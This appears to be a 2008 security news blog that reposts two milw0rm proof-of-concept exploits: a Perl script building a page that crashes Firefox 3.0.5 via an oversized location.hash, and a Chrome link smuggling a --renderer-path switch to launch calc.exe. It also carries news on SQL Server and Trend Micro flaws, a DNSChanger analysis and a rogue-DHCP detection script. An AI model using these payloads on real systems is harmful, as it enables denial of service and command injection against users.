Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit

December 23, 2008 – 5:24 PM

#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP
use strict;
use warnings;

# The output file name is the only argument. Exit when it is missing instead
# of falling through to open() with an undefined name (the original printed
# the usage text and then continued).
my $filename = $ARGV[0];
if (!defined($filename)) {
    print "Usage: $0 <filename.html>\n\n";
    exit 1;
}

# The generated page assigns a 20,000,000-character string to location.hash.
my $head = "<html>\n<script type=\"text/javascript\">\n";
my $trig = "location.hash = \"" . "A" x 20000000 . "\";\n";
my $foot = "</script>\n</html>";

my $data = $head . $trig . $foot;

open(my $fh, '>', $filename) or die "Cannot open $filename for writing: $!\n";
print $fh $data;
close($fh);

exit;

Source:
http://www.milw0rm.com/exploits/7554

Google Chrome Remote Parameter Injection

December 23, 2008 – 5:19 PM
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

Source:
http://www.milw0rm.com/exploits/7566

Microsoft confirms critical SQL Server vulnerability

December 22, 2008 – 6:38 PM

Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.

The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon).

The vulnerability is not exposed anonymously. An attacker would need to either authenticate to exploit the vulnerability or take advantage of a SQL injection vulnerability in a Web application that is able to authenticate, Microsoft explained.

A T-SQL script is available to test systems for this issue. In the absence of a patch, Microsoft recommends that SQL Server admins deny permissions on the sp_replwritetovarbin extended stored procedure. See more in the Microsoft advisory.

Source:
http://blogs.zdnet.com/security/?p=2333

Researchers sound alarm about bug in free antivirus scanner

December 22, 2008 – 6:32 PM

A bug in Trend Micro’s free online virus scanning service can be used by hackers to hijack Windows PCs running Internet Explorer, security researchers warned.

Attackers able to dupe users into visiting a malicious Web page could exploit a vulnerability in the custom ActiveX control that Trend Micro distributes to users of its free HouseCall service, said Danish bug tracker Secunia ASP in an alert posted Sunday.

HouseCall bills itself as a free scanning tool that checks “whether your computer has been infected by viruses, spyware, or other malware.”

“The vulnerability is caused due to a use-after-free error in the HouseCall ActiveX control (Housecall_ActiveX.dll),” said Secunia’s warning. “This can be exploited to dereference previously freed memory by tricking the user into opening a Web page containing a specially crafted ‘notifyOnLoadNative’ callback function.”

Trend Micro has fixed the flaw in the ActiveX control and patched the public HouseCall servers, but it noted that the latter has not been extensively tested, and essentially waived responsibility if it turns out not to be sufficient.

Source:
http://www.computerworld.com.au/article/271665/researchers_sound_alarm_about_bug_free_antivirus_scanner

DNSChanger 2.0

December 21, 2008 – 11:57 AM

DNS Changer 2.0 (Trojan.Flush.M) is the next in-the-wild variant of this well-known malware. The strategy has changed: it no longer needs to modify the DNS settings on ADSL routers. Instead, it installs a network driver (NDISProt.sys) that lets the malware send and receive raw Ethernet packets, which allows it to bypass the Windows TCP/IP stack, firewalls and HIPS.

It installs a rogue DHCP server on the infected machine, listens for DHCP requests and answers them with its own crafted DHCP offer packets. The reply carries malicious DNS servers, which redirect hosts to infected websites ranging from phishing pages to exploit-and-infect pages.
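As an added example (not from the original post or the malware analysis it summarises), the following Python check parses a DHCP OFFER and flags any DNS server in option 6 that is not on an assumed allow-list of the network's legitimate resolvers; the allow-list addresses and the packet builder used for sample input are constructed for this demo.

```python
from typing import Dict, List

# Assumed allow-list: the resolvers the network's real DHCP server hands out.
EXPECTED_DNS = {"192.0.2.53", "192.0.2.54"}
DHCP_MAGIC = b"\x63\x82\x53\x63"          # option-area cookie (RFC 2132)
OPT_MSG_TYPE, OPT_DNS, OPT_END = 53, 6, 255
DHCP_OFFER = 2

def parse_dhcp_options(payload: bytes) -> Dict[int, bytes]:
    """Parse the TLV option area that follows the 236-byte fixed BOOTP header."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == OPT_END:
            break
        if code == 0:                      # pad byte, no length field
            i += 1
            continue
        length = payload[i + 1]
        opts[code] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def rogue_dns_servers(payload: bytes) -> List[str]:
    """Return DNS servers offered in a DHCP OFFER that are off the allow-list."""
    opts = parse_dhcp_options(payload)
    if opts.get(OPT_MSG_TYPE) != bytes([DHCP_OFFER]):
        return []                          # only OFFERs carry a resolver list
    raw = opts.get(OPT_DNS, b"")
    servers = [".".join(str(b) for b in raw[j:j + 4])
               for j in range(0, len(raw) // 4 * 4, 4)]
    return [s for s in servers if s not in EXPECTED_DNS]

def build_offer(dns_servers: List[str]) -> bytes:
    """Construct a minimal DHCP OFFER for testing (constructed, not a capture)."""
    fixed = bytes([2, 1, 6, 0]) + b"\x00" * 232   # op=BOOTREPLY, rest zeroed
    dns_raw = b"".join(bytes(int(p) for p in s.split(".")) for s in dns_servers)
    options = (bytes([OPT_MSG_TYPE, 1, DHCP_OFFER])
               + bytes([OPT_DNS, len(dns_raw)]) + dns_raw + bytes([OPT_END]))
    return fixed + DHCP_MAGIC + options

if __name__ == "__main__":
    print(rogue_dns_servers(build_offer(["192.0.2.53", "198.51.100.9"])))
```

Run against OFFERs captured on a segment (for example from a DHCP relay or a passive sniffer), a non-empty result from rogue_dns_servers points at a host answering DHCP with resolvers the network never configured.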

Source:
http://www.offensivecomputing.net/?q=node/1012